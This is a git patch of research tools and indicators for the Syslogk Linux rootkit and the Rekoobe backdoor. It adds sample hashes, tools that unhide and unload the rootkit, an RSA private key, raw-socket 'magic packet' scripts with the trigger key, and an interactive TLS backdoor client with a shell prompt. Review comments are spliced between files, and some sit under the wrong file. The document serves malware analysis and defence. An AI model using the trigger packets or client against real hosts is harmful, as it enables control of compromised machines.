From 0e673de28789d2e367f22c58b872080eb5945a9d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?David=20=C3=81lvarez?= Date: Mon, 13 Jun 2022 08:48:05 +0200 Subject: [PATCH] Syslogk Rootkit --- SyslogkRootkit/README.md | 91 +++++++++++++++++++ SyslogkRootkit/Research Tools/cert.pem | 48 ++++++++++ .../magic_packet_kill_rekoobe.py | 29 ++++++ .../magic_packet_start_rekoobe.py | 26 ++++++ .../Research Tools/rekoobe_backdoor_client.py | 39 ++++++++ .../remove_syslogk_from_memory.sh | 3 + .../Research Tools/unhide_rootkit.c | 14 +++ SyslogkRootkit/samples.md5 | 71 +++++++++++++++ SyslogkRootkit/samples.sha1 | 71 +++++++++++++++ SyslogkRootkit/samples.sha256 | 71 +++++++++++++++ 10 files changed, 463 insertions(+) create mode 100644 SyslogkRootkit/README.md create mode 100644 SyslogkRootkit/Research Tools/cert.pem create mode 100644 SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py create mode 100644 SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py create mode 100644 SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py create mode 100644 SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh create mode 100644 SyslogkRootkit/Research Tools/unhide_rootkit.c create mode 100644 SyslogkRootkit/samples.md5 create mode 100644 SyslogkRootkit/samples.sha1 create mode 100644 SyslogkRootkit/samples.sha256 diff --git a/SyslogkRootkit/README.md b/SyslogkRootkit/README.md new file mode 100644 index 0000000..a77aca7 --- /dev/null +++ b/SyslogkRootkit/README.md @@ -0,0 +1,91 @@ +# IoC for Syslogk Kernel Rootkit hiding Rekoobe + +### Table of Contents +* [IoCs](#IoCs) +* [Source Code of our research tools](#Source-Code-of-our-research-tools) + +## Samples (SHA-256) +#### IoCs +```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``` +## Source Code of our research tools +``` +unhide_rootkit.c +remove_syslogk_from_memory.sh +magic_packet_start_rekoobe.py +magic_packet_kill_rekoobe.py +rekoobe_backdoor_client.py +cert.pem +``` 
diff --git a/SyslogkRootkit/Research Tools/cert.pem b/SyslogkRootkit/Research Tools/cert.pem
new file mode 100644
index 0000000..08a8745
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/cert.pem
@@ -0,0 +1,48 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEogIBAAKCAQEAtlnqZJNnTEKf2rx6scEqc2vCnGjOJO/Os2gEJTwvLym9SWSM
+NZ2GTNOKmKsuF8AIbzWnOujglzmbyJjN28iyt2IUkTHEJIrb7ka2EnxnRP9uhA7Q
+OPl0BI7wi2kmZNrXshKXYnWNWikdRuVMv4J6WFqjx8GDq9NVBwZpqF4OqZzEUcT4
+yTmVaf9v2Ll2JUnhP3VXiv35ng0UT7rMqlB73qQalPjmmcQLOzGrdbJXadLePZzp
+0BX5MVVW4vPxXxhZpdZCT6J6CxPUN589//IMm3cHPZ0xVcbheDmJG9FTNPXxhOc/
+wBEGzmNTzLcjiwRkuzSx7gQsDCvUC/+Lc/nFxwIDAQABAoIBAB24xiWiiQG7Ekca
+1XzHmV26wLuxsXf/xlcjqxlOl/o9+WZPBzNt+4fmKv77V8XzPOyzeBB4CLNdZnDp
+xxP9wHN3fxazX9786yAJUn/s2wA6Cg9oQrQmpKxhh/+RIfrqWKHjud0IgAOkE+uM
+UFgeskZYb72NYyLMjV1ZxDr3KbinWDqVUS7R/7QdsJH4c+rs9ML+l/2LOgJp8XBN
+3LM9XEuX/conJBWm+cszHwB+QtacIrgKd/RPIfcOBTXsm3dl1Ai0aXCG8dmarFaa
+iziIpz9CvuvqMfs0Gbyqjgff45F2oxHuv0SO9SLcgw/iExfoELodydUoqffl+WRN
+CSFvXHECgYEA3iHHdv+qXJYJgIi/wotNi7T1+r00WkCGAtDxLWA25mIlCbddLck8
+zp/Q37Z49Pt96O5xVzsSPjQIhUkOXb26IlGNpddRZbWCcHAiG0YpagiFfAuqlqYG
+9bds9rfpSG6iSb8d1cF3YFNJKAyX/z3MtF0jwJbJ0tfBWCpzDHdALQ0CgYEA0idr
+5d07FyExNYojpNqHJm0JC4JpJd5eFz22wuA3+7+X0Ce8Qu7X3sDvJXu094YVFQkR
+BNTI6ZLw+fXhhGNcsinzJYfKDGmXMNiH+OdqyozzysiqCf83rZ204I47Q4pocdYi
+upVWjdk/UcAYKxu5kSjyOFoXhgHBEIJAZSQc0SMCgYA+6TA1yqj0OeYNCi3NKmjW
+9XRpBCcMnJOXvpdfs4046Hj27ICuU/0tw+ODSImvUH7TdpyRCQDcrx3uqccw02gh
+Chnk6zt5Y9PChm+Sa+eUyT8M57zzl6gG9WEd6u5d/j9mRYNso7Nsi4n/lrmBp34P
+YwWaKNqWJVbz4mndEPUTDQKBgFkSLlAp2T6vacz4dK0NlhS6SAghyPEs85JELO8h
+23iPNwgZn1h7JPGbsoCfkw8KPGtDAXybt2AQUKSRC3lyJ7q3vv+cMw3ZvyQL0m2z
+n/ajkTzUmgVMr8udOSmn/wRcaHI/QU71ts6+UnESyuuSf68/vJIX1TqOCcc2fZag
+nLojAoGAJdKPzWeIpV86OhMAHY4cU7wKVs25dHtzT067z/Jh6Of2BQG1Q6qUd5mb
+JBwXFjWEECMXf9aaVdx+TLIuAE0dvYBTUHRPE+BomKVRx0+heESDeX0Y3H3rb3Xg
+SqRTtAdcSLNrZIw1MPQF+VeOLjI0BiuRS0aqsIn+7hqqvG42mUA=
+-----END RSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIDZTCCAk0CFGea+DeQMw739YWJuj8NI38FvCzLMA0GCSqGSIb3DQEBCwUAMG8x
+CzAJBgNVBAYTAkFVMQ0wCwYDVQQIDARuYW1lMQ0wCwYDVQQHDARjaXR5MSEwHwYD
+VQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQxEDAOBgNVBAsMB3NlY3Rpb24x
+DTALBgNVBAMMBG5hbWUwHhcNMTgxMTE5MTg0OTA2WhcNMTkxMTE5MTg0OTA2WjBv
+MQswCQYDVQQGEwJBVTENMAsGA1UECAwEbmFtZTENMAsGA1UEBwwEY2l0eTEhMB8G
+A1UECgwYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMRAwDgYDVQQLDAdzZWN0aW9u
+MQ0wCwYDVQQDDARuYW1lMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
+tlnqZJNnTEKf2rx6scEqc2vCnGjOJO/Os2gEJTwvLym9SWSMNZ2GTNOKmKsuF8AI
+bzWnOujglzmbyJjN28iyt2IUkTHEJIrb7ka2EnxnRP9uhA7QOPl0BI7wi2kmZNrX
+shKXYnWNWikdRuVMv4J6WFqjx8GDq9NVBwZpqF4OqZzEUcT4yTmVaf9v2Ll2JUnh
+P3VXiv35ng0UT7rMqlB73qQalPjmmcQLOzGrdbJXadLePZzp0BX5MVVW4vPxXxhZ
+pdZCT6J6CxPUN589//IMm3cHPZ0xVcbheDmJG9FTNPXxhOc/wBEGzmNTzLcjiwRk
+uzSx7gQsDCvUC/+Lc/nFxwIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQCPHTnCCOzh
+dkc19fLU327wAYvoRi6T73Ik3wxI+A2U6ATo8qY6dZEvynmhBxhkhYahrfYRYYYB
+1fbbYqKYfBR1Hcr/Q4q0J/wyCwG7ZejvkgFHILUEBb9is7obBudAryZDBpRyNK6a
+k8aotUnH4bDlyLC6lUQlapzihr3WE5mGzjnVIH2YCN4ooyshkQi6wGvHJ2QudQBB
+2qwN6dJbZbtj8j9tFPCojKGQlW8wnLxRoim2188z+DTW6Wb+I3/bWI12uP9YhQ7L
+kBHt495ClCqUsrVSUjcgttazGWvcM2ms/UrUoNdbhKsDzx1rvpDdb5sz6170Zg7z
+7ikRaS9ULzzm
+-----END CERTIFICATE-----
diff --git a/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py b/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py
new file mode 100644
index 0000000..161fc7e
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/magic_packet_kill_rekoobe.py
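Review bot: An RSA private key is committed next to its certificate and nothing in the tree says it is throwaway material; rekoobe_backdoor_client.py presents this file as `certfile`, and the subject appears to be OpenSSL's interactive default (Internet Widgits Pty Ltd — confirm with `openssl x509 -in cert.pem -noout -subject -dates`), so it reads as a self-signed lab credential rather than a leaked secret, but neither a reader nor a secret scanner can tell that from the file itself. A one-line note in the README beside the `cert.pem` entry, such as `cert.pem — self-signed throwaway client key/cert used only by rekoobe_backdoor_client.py; not a secret`, plus an allowlist entry if the repository runs secret scanning, would settle it.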
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""Syslogk magic packet for killing Rekoobe
+ (it requires knowing the key 'D9sd87JMaij' and also matching some fields
+ of the magic packet used for starting Rekoobe)
+"""
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
+s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+
+ip_header = b'\x45\x00\xB3\xF7' # Version, IHL, Type of Service | Total Length
+ip_header += b'\xb6\xe7\x00\x00' # Identification | Flags, Fragment Offset
+ip_header += b'\x40\x06\xa6\xec' # TTL, Protocol | Header Checksum
+ip_header += b'\x0a\x00\x02\x0E' # Source Address
+ip_header += b'\x0a\x00\x02\x0F' # Destination Address
+
+tcp_header = b'\xF7\xA9\x00\x00' # Source Port | Destination Port
+tcp_header += b'\x00\x00\x00\x00' # Sequence Number
+tcp_header += b'\x00\x00\x00\x00' # Acknowledgement Number
+tcp_header += b'\x50\x08\x71\x10' # Data Offset, Reserved, Flags | Window Size
+tcp_header += b'\xe6\x32\x00\x00' # Checksum | Urgent Pointer
+
+data = b"jiaMJ78ds9D"[::-1]
+
+packet = ip_header + tcp_header + data
+s.sendto(packet, ('10.0.2.15', 1))
diff --git a/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py b/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py
new file mode 100644
index 0000000..30313b8
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/magic_packet_start_rekoobe.py
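Review bot: Every address, port and checksum in this packet is a precomputed lab value — the IP header encodes 10.0.2.14 → 10.0.2.15 with a literal header checksum `\xa6\xec`, the TCP header a literal checksum `\xe6\x32`, and the destination is typed a second time as a string in `s.sendto(...)` — yet nothing in the script computes or documents that, so changing one address silently leaves the rest stale; magic_packet_start_rekoobe.py has the same shape and this note applies there too. A comment above `ip_header` such as `# All header fields, including both checksums, are precomputed for src 10.0.2.14 / dst 10.0.2.15 in the research VM; changing an address means recomputing them and the sendto() target` would make that explicit. The raw socket is also never closed; `s.close()` after the `sendto` (or a `with socket.socket(...) as s:` block if Python 3 is the only target) tidies that up.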
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""Syslogk magic packet for starting Rekoobe
+ (it first kills all running instances of Rekoobe)
+"""
+
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
+s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
+
+ip_header = b'\x45\x00\xB3\xF7' # Version, IHL, Type of Service | Total Length
+ip_header += b'\xb6\xe7\x00\x00' # Identification | Flags, Fragment Offset
+ip_header += b'\x40\x06\xa6\xec' # TTL, Protocol | Header Checksum
+ip_header += b'\x0a\x00\x02\x0E' # Source Address
+ip_header += b'\x0a\x00\x02\x0F' # Destination Address
+
+tcp_header = b'\xB6\xE7\x00\x00' # Source Port | Destination Port
+tcp_header += b'\x00\x00\x00\x00' # Sequence Number
+tcp_header += b'\x00\x00\x00\x00' # Acknowledgement Number
+tcp_header += b'\x50\x02\x71\x10' # Data Offset, Reserved, Flags | Window Size
+tcp_header += b'\xe6\x32\x00\x00' # Checksum | Urgent Pointer
+
+packet = ip_header + tcp_header
+s.sendto(packet, ('10.0.2.15', 1))
diff --git a/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py b/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py
new file mode 100644
index 0000000..06d07d8
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/rekoobe_backdoor_client.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""Rekoobe backdoor client
+"""
+
+import socket
+import ssl
+
+HOST = "127.0.0.1"
+PORT = 45681
+client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+
+if __name__ == "__main__":
+ client.connect((HOST, PORT))
+ print(client.recv(200))
+ client.send("\r\n")
+ print(client.recv(200))
+ client.send("starttls\r\n")
+ print(client.recv(200))
+ ssl_client = ssl.wrap_socket(client, certfile="./cert.pem")
+ ssl_client.send(b"\x03")
+ ssl_client.send(b"%")
+ ssl_client.send(b"0002")
+ ssl_client.send(b"\r\n")
+ ssl_client.settimeout(1)
+ ssl_client.recv()
+ while True:
+ command = raw_input("Shell>")
+ command += "\r\n"
+ command = command.encode()
+ ssl_client.send(command)
+ try:
+ # Receiving stdin, stdout, stderr
+ while True:
+ print(ssl_client.recv())
+ except ssl.SSLError:
+ pass
diff --git a/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh b/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh
new file mode 100644
index 0000000..cdc25a5
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/remove_syslogk_from_memory.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+echo 1>/proc/syslogk
+rmmod syslogk
diff --git a/SyslogkRootkit/Research Tools/unhide_rootkit.c b/SyslogkRootkit/Research Tools/unhide_rootkit.c
new file mode 100644
index 0000000..d1ad6db
--- /dev/null
+++ b/SyslogkRootkit/Research Tools/unhide_rootkit.c
@@ -0,0 +1,14 @@
+// It unhides the Syslog Rootkit
+#include
+#include
+#include
+#include
+#include
+
+void main(void)
+{
+ int fd = open("/proc/syslogk", O_WRONLY);
+ lseek(fd, 0 , SEEK_SET);
+ write(fd, "1", 1); // Command for unhiding the module
+ close(fd);
+}
\ No newline at end of file
diff --git a/SyslogkRootkit/samples.md5 b/SyslogkRootkit/samples.md5
new file mode 100644
index 0000000..8ea1b61
--- /dev/null
+++ b/SyslogkRootkit/samples.md5
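Review bot: The script is Python-2-only but ships under the unpinned `#!/usr/bin/env python`: `client.send("\r\n")` and `client.send("starttls\r\n")` pass `str` where the later `ssl_client.send` calls pass `bytes`, the prompt uses `raw_input`, and the `except ssl.SSLError` that ends each read loop depends on the 1-second `settimeout` surfacing as an SSLError (Python 2 behaviour; Python 3 raises `socket.timeout` there, as far as I can tell), so under Python 3 the first `send` fails with TypeError before the TLS step is reached. Pinning `#!/usr/bin/env python2` and stating the interpreter in the docstring is the minimal fix; converting the two literals to `b"\r\n"` / `b"starttls\r\n"` costs nothing either way. `ssl.wrap_socket` is also used with its default `cert_reqs`, i.e. no peer verification, and `certfile="./cert.pem"` resolves against the current working directory rather than the script's location; both are acceptable for a lab tool but deserve a one-line comment so the pattern is not copied elsewhere.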
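Review bot: `echo 1>/proc/syslogk` does not write a `1`: bash parses `1>` as a redirection of file descriptor 1, so the command actually run is a bare `echo` with stdout pointed at /proc/syslogk, and the module receives only a newline. The intended line is `echo 1 > /proc/syslogk` — the C tool in the same commit writes the byte `"1"` and comments it as the unhide command. Whether the rootkit's write handler happens to accept the empty write cannot be told from here; the explicit form is correct either way, and a `set -e` at the top would keep `rmmod syslogk` from running after a failed write.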
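Review bot: The result of `open()` is never checked, so when /proc/syslogk is absent (module not loaded, or not exposing that entry) or the caller lacks permission, `lseek`, `write` and `close` all run on `fd == -1` and the program still exits as if it had succeeded; `void main(void)` also leaves the caller no exit status to test, and C requires `int main`. The `lseek` to offset 0 is redundant on a freshly opened descriptor, so the rewrite drops it. The five `#include` lines show no header names on this page — most likely stripped in rendering — but it is worth confirming that `<stdio.h>`, `<fcntl.h>` and `<unistd.h>` are among them, since the rewrite below relies on `perror`.
```c
// … unchanged: header comment and includes …
int main(void)
{
    int fd = open("/proc/syslogk", O_WRONLY);
    if (fd < 0) {
        perror("open /proc/syslogk");  /* entry absent or insufficient privilege */
        return 1;
    }
    if (write(fd, "1", 1) != 1) {  // Command for unhiding the module
        perror("write /proc/syslogk");
        close(fd);
        return 1;
    }
    close(fd);
    return 0;
}
```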
@@ -0,0 +1,71 @@
+43d49693658a2ee2f1a31f780a2a8994
+358b58523b59d87f2831011f9e441362
+1eb9864a6d939dd7b882ac801165ac18
+f38fb09982cf301df17709b3adc085c2
+a874271e10b9c094f72fca6566d947fe
+69fc4610667464b37edb750cde2f5783
+5f2e72ff741c4544f66fec16101aeaf0
+75f9dd103dd05ca263af33c46f3f808d
+b1b1c04eba3668713a8c09b2d2178ace
+0a35e06f53c17ab1c8e18e7e0c0821d8
+1130c613a858b07234bf93663f5341eb
+24b411d2407527c7a58317c6758dca09
+1594d98385fe1682363c7ff2e9e8eba2
+e6bad14fff4f94705a2d8a628799025d
+a0dfa397428321fbd689464053c05da0
+e1cff1d865dd4a59d1245ebcec5f6768
+bf71b7b65a2b505a5c54855bcc8dd0ba
+35743db3dc333245ef5b69100721ced9
+81627048b6aea0c94256a1aaf8da617d
+eec8680ebb6926b75829acec93bb484d
+fda1948b62267383471adf0bb5fdb733
+95833f73123a94f01243339c21e62903
+ab811a9e4cc9fe3dfddff5f6635b599b
+0086f56a8e688586f5404dae991228e8
+b5cc891b885d9175da892a2ef932fdfc
+cb093453576184d1a2f59063dafa7f80
+22402bb153e035a7c94cea13d46e2e11
+d35657a79c7e0d3ab1fe589f5e8088a1
+c06dd1fe1944e4ddfca52c61d27f5f95
+0cda4f097a9b072f4dd8bf3ac6cf273a
+1ab35838f3e9bb899d385c6554883243
+791dd369c4acf8603a05de1e1dc53e64
+70334968d03654eb1c274eed997c0c3d
+edf7237aa215ce189647a0e231555df0
+22d3bac34718c93966c43390ac7e180d
+dd550a0210d9dd4062af1cd8b4acf218
+9122641b443f1fb82518e28c1c23cace
+d9f00f71efabdfcca7c63d4b0805673c
+1a6b53d9c8d093e5a6c988839fa7b4a0
+6a57986bfcc309556c4ca4168dbe86f2
+68cc213e17cf9acb84460085b1b7514d
+97db3f7676380f0baa3840ed5d5c1767
+d38ab3af331c2ce3d2df3a20e4d549ef
+bbca59926c8639a0cf8469cbed8303e8
+d8e9f6bf6c0c5bcd5de9f338da3c76a9
+1d37c331d8c67291ce56e0f4c45604b8
+64b26d72396de5892fd4ceca6b32511b
+6d91b9aa0139498dc99f50c3529c4468
+4235eba1cfd789d8d66ee782db848fed
+a131408c6be036fa3e94585dca7fddf1
+95cffe67742da99a7dc35ffc9fbde026
+901a242517aa71c0768500f81f9a3ad3
+85accdf83bd768a765fc4d0ca8c6105e
+d1fb3820d0911e155a330189dbb754ed
+c4a9d1873454347ad26921cdd83d9870
+32d8f6ee0c9e5971b0fb6bef53e91d75
+de79f0a71a56161c3405445a25e2c825
+635497c5fd2c58db380ad689d9084ff5
+5e59d6f7442b7d979dbba9dbbe565efc
+d75ecc784b27c06d3d56c28f6560ec41
+355358a22b6f1d9e122c2ff830b2849b
+492386efefa9ff716b6f0fe4ff46d796
+4640805c362b1e5bee5312514dd0ab2b
+97fca49a88af844cfecbb99ae692b4a8
+8dc647c9bc7d9594dee48092e9ee5f64
+ae8ecedb8fcebf7fc48c8fea8f63180e
+c4b4cb5395a1ee59a00536a0b17a7c28
+7c30c520bb000220e60e2a6dbec20356
+fecc8bbfbb379d271a2fefbecb7788d1
+14329d09c4ae1156b61ff683127ee1c9
+cabb1200867e788e21ab6966c3914d05
\ No newline at end of file
diff --git a/SyslogkRootkit/samples.sha1 b/SyslogkRootkit/samples.sha1
new file mode 100644
index 0000000..7501265
--- /dev/null
+++ b/SyslogkRootkit/samples.sha1
@@ -0,0 +1,71 @@
+fe0441fa2c511a80a5d50330204126ae5739af49
+bb53fdf418635beab2112412ed0b1bed6d40f0d4
+9e3112b859954bcbe6a4e32e1a1eee3fb491df54
+ef07da968cdfed7b1e9745a360536bf9d3a9dde8
+2c014fdc8a3298fe073ef95f14ca594c85c70006
+60024cf6fa9adeb384e56367a3a7a7514788d806
+f733802a106f1a2a4249f1605522cdd436110109
+7a8cc29b82415463ea025436e643115fc1ee4147
+98dcd7ac8cc2cbfefd644d5decb34e7002cf1323
+14fd16e6465b74c5ac4dc895f4c15bccb447af31
+b0f74062405a161453621cb1ce4daa6ca09db960
+f85e3ef06c8b5cf8805a4df2560338f007cf3dd7
+61efc60e94cd630f181e8a0f895933cf52c92916
+d4b855b2c9db3fdb34182d00b9a0a455086b8e50
+872f08ee076ddda7d172f9d96f61d1d68662b036
+0bcf6a9ed93c45c2865f3961079d207479be611a
+a443b0f3561d4bd8e40b5daed3f6915a5e03e6c2
+fa681933eccc1b3cae4cce6ab6f16db08c2f2a87
+3e2b3ab9e85f4a15a03f59ac4b288119658b24b6
+bb37e133d6901659c4b61a53082a3e6c83ff180a
+1ae878306e1732402d949e2ce91ab7b0bdf9f5b9
+55aa4d1541d8a76471a7e06083389a3547ec0472
+cbe804bc2ce4a20281d33f1af5d99931e2162ff7
+cb93c60496e3862afbd1647ceee19ce970aea88f
+ab7df4d4b0734a7c30997940af3b54debb1006ae
+2f19ff48fd8ff94557d44c7417ec10069cd158e9
+bfeb14b982fa9a01f01fd2e03be4ca5e92849040
+394624cfe12d4d58a91c691b154b61206eb19f1f
+f52f35b8cc98b7fa1a19c6cc8371ccd163a7c624
+d3c4bd3ba3775af039bd30e47ca43ff6ca285297
+f909794ab799ea535e96611a12ed8cb872584390
+0cae8afef7e715019ef969b83bc1e4d3a2d531c7
+2e470d8b81fdea77d79af68519509aa136edf67e
+80ba296be9ba1f945500bd468026157fad4f7fb8
+11315b4e597672362212a4bbccbb504e41e6c349
+95495c01db77576c1fb14a96efa7fe2132f3ae7f
+7b190757efdd470fca4127948c6297d53adf3958
+49c4aa2812535884bd9d3a564e7656dec150933a
+9b2c0690e12a27433e0307af22588213dffe639a
+d76a1fe4733ab0453ae95abecb82f252da449f83
+33c35312b2b57686da695ed0b2a63bb14d28e2be
+4fe8efef8c2e7cc3bafee19da8b223daae2242a1
+afa7e2753f78322467b8ac6bcdcb3b7f33c9864f
+88233293c1d0d64e05d29ae5f006ff8094006374
+732e62bec281943aa49fe679bf9f676ad0e36b8b
+e050ae9bbb0029d4c6045661f4b3ae829bd74c39
+b0ee6f6e202fa708ab4fcae61f8bd4d236ee7d95
+c01aa4e298aad696b52dae8e498505aa099208a5
+95494d0ce800f2973dc9397c4e7d14762c90404c
+ec15bcb9a62cdac24637ad90439d1c6227eaff25
+7f261bffdc4822b471a3719a91dfbf61098cfe4b
+165f63816292da06299863cf7643d5798dd30e95
+cddd58e820acbbc3d3237c7a8bec665255c90a38
+ecda0bdc7f34871787215929bcf500bef8be099d
+fd2143c6088044176647e44bd8acf909eb3fed0f
+01f004d40305c194a1063d47c46bb3787ab84a1d
+7c9290587d0954dfa6b19fb4ae3b7bfe30d046b2
+28457abeb8af2b882f226397ed4e383b6f74fbb4
+752e5c2ed95cc518582c069cf0b9ad477899463a
+8d4f1d20c0b55c4c22971837482b0b8a5e93480a
+b19c1696b032805014f9cc289caf45e346936583
+845160c24a9177eaf02f5800bc5876508b3b8960
+f743a235ebed3f1757074acbef2f0c8b2d3f833a
+53abaef53d6b87e16df254b5d2a7886ba4af0be9
+00af7dcd02ebe1ea97dde77df7ef90cecd6e33db
+6cf5541546dff30bdb8c5203766ec0826d70d214
+6256a050210bf8075eebf1c3ebdea36ea22bcd13
+b818ecefd6dc92e51a6ba232bfa562b5c4c2c31c
+275ae290639984f11f43da603acc7faa7deaa564
+63e717d1caa3d0a4436ade9b263a0622dcdb8838
+63588250c49b06aaecc854fe59b17b3f9b5bfeff
\ No newline at end of file
diff --git a/SyslogkRootkit/samples.sha256 b/SyslogkRootkit/samples.sha256
new file mode 100644
index 0000000..7b3793d
--- /dev/null
+++ b/SyslogkRootkit/samples.sha256
@@ -0,0 +1,71 @@
+020a6b7edcff7764f2aac1860142775edef1bc057bedd49b575477105267fc67
+031183e9450ad8283486621c4cdc556e1025127971c15053a3bf202c132fe8f9
+06778bddd457aafbc93d384f96ead3eb8476dc1bc8a6fbd0cd7a4d3337ddce1e
+08a1273ac9d6476e9a9b356b261fdc17352401065e2fc2ad3739e3f82e68705a
+11edf80f2918da818f3862246206b569d5dcebdc2a7ed791663ca3254ede772d
+12c1b1e48effe60eef7486b3ae3e458da403cd04c88c88fab7fca84d849ee3f5
+14a33415e95d104cf5cf1acaff9586f78f7ec3ffb26efd0683c468edeaf98fd7
+160cfb90b81f369f5ba929aba0b3130cb38d3c90d629fe91b31fdef176752421
+178b23e7eded2a671fa396dd0bac5d790bca77ec4b2cf4b464d76509ed12c51a
+275d63587f3ac511d7cca5ff85af2914e74d8b68edd5a7a8a1609426d5b7f6a9
+29058d4cee84565335eafdf2d4a239afc0a73f1b89d3c2149346a4c6f10f3962
+2e81517ee4172c43a2084be1d584841704b3f602cafc2365de3bcb3d899e4fb8
+2fea3bc88c8142fa299a4ad9169f8879fc76726c71e4b3e06a04d568086d3470
+31330c0409337592e9de7ac981cecb7f37ce0235f96e459fefbd585e35c11a1a
+337674d6349c21d3c66a4245c82cb454fea1c4e9c9d6e3578634804793e3a6d6
+38f357c32f2c5a5e56ea40592e339bac3b0cabd6a903072b9d35093a2ed1cb75
+3a6f339df95e138a436a4feff64df312975a262fa16b75117521b7d6e7115d65
+3bff2c5bfc24fc99d925126ec6beb95d395a85bc736a395aaf4719c301cbbfd4
+42bc744b22173ff12477e57f85fa58450933e1c4294023334b54373f6f63ee42
+48671bc6dbc786940ede3a83cc18c2d124d595a47fb20bc40d47ec9d5e8b85dc
+4effa5035fe6bbafd283ffae544a5e4353eb568770421738b4b0bb835dad573b
+50b73742726b0b7e00856e288e758412c74371ea2f0eaf75b957d73dfb396fd7
+55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b
+5b8059ea30c8665d2c36da024a170b31689c4671374b5b9b1a93c7ca47477448
+6711d5d42b54e2d261bb48aa7997fa9191aec059fd081c6f6e496d8db17a372a
+68facac60ee0ade1aa8f8f2024787244c2584a1a03d10cda83eeaf1258b371f2
+6f27de574ad79eb24d93beb00e29496d8cfe22529fc8ee5010a820f3865336a9
+6fc03c92dee363dd88e50e89062dd8a22fe88998aff7de723594ec916c348d0a
+72f200e3444bb4e81e58112111482e8175610dc45c6e0c6dcd1d2251bacf7897
+73bbabc65f884f89653a156e432788b5541a169036d364c2d769f6053960351f
+74699b0964a2cbdc2bc2d9ca0b2b6f5828b638de7c73b1d41e7fe26cfc2f3441
+79916343b93a5a7ac7b7133a26b77b8d7d0471b3204eae78a8e8091bfe19dc8c
+7a599ff4a58cb0672a1b5e912a57fcdc4b0e2445ec9bc653f7f3e7a7d1dc627f
+7b88fa41d6a03aeda120627d3363b739a30fe00008ce8d848c2cbb5b4473d8bc
+7e0b340815351dab035b28b16ca66a2c1c7eaf22edf9ead73d2276fe7d92bab4
+8285ee3115e8c71c24ca3bdce313d3cfadead283c31a116180d4c2611efb610d
+864c261555fce40d022a68d0b0eadb7ab69da6af52af081fd1d9e3eced4aee46
+870d6c202fcc72088ff5d8e71cc0990777a7621851df10ba74d0e07d19174887
+8b036e5e96ab980df3dca44390d6f447d4ca662a7eddac9f52d172efff4c58f8
+8b18c1336770fcddc6fe78d9220386bce565f98cc8ada5a90ce69ce3ddf36043
+8bb7842991afe86b97def19f226cb7e0a9f9527a75981f5e24a70444a7299809
+8ec87dee13de3281d55f7d1d3b48115a0f5e4a41bfbef1ea08e496ac529829c8
+958bce41371b68706feae0f929a18fa84d4a8a199262c2110a7c1c12d2b1dce2
+9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d
+a93b9333a203e7eed197d0603e78413013bd5d8132109bbef5ef93b36b83957c
+af9a19f99e0dcd82a31e0c8fc68e89d104ef2039b7288a203f6d2e4f63ae4d5c
+b0d69e260a44054999baa348748cf4b2d1eaab3dd3385bb6ad5931ff47a920de
+b22f55e476209adb43929077be83481ebda7e804d117d77266b186665e4b1845
+b4d0f0d652f907e4e77a9453dcce7810b75e1dc5867deb69bea1e4ecdd02d877
+bcc3d47940ae280c63b229d21c50d25128b2a15ea42fe8572026f88f32ed0628
+bd07a4ccc8fa67e2e80b9c308dec140ca1ae9c027fa03f2828e4b5bdba6c7391
+bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e
+c32e559568d2f6960bc41ca0560ac8f459947e170339811804011802d2f87d69
+c6d735b7a4656a52f3cd1d24265e4f2a91652f1a775877129b322114c9547deb
+ca2ee3f30e1c997cc9d8e8f13ec94134cdb378c4eb03232f5ed1df74c0a0a1f0
+cf525918cb648c81543d9603ac75bc63332627d0ec070c355a86e3595986cbb3
+d129481955f24430247d6cc4af975e4571b5af7c16e36814371575be07e72299
+d3e2e002574fb810ac5e456f122c30f232c5899534019d28e0e6822e426ed9d3
+d690d471b513c5d40caef9f1e37c94db20e6492b34ea6a3cddcc22058f842cf3
+da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08
+df90558a84cfcf80639f32b31aec187b813df556e3c155a05af91dedfd2d7429
+e08e241d6823efedf81d141cc8fd5587e13df08aeda9e1793f754871521da226
+e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94
+e3d64a128e9267640f8fc3e6ba5399f75f6f0aca6a8db48bf989fe67a7ee1a71
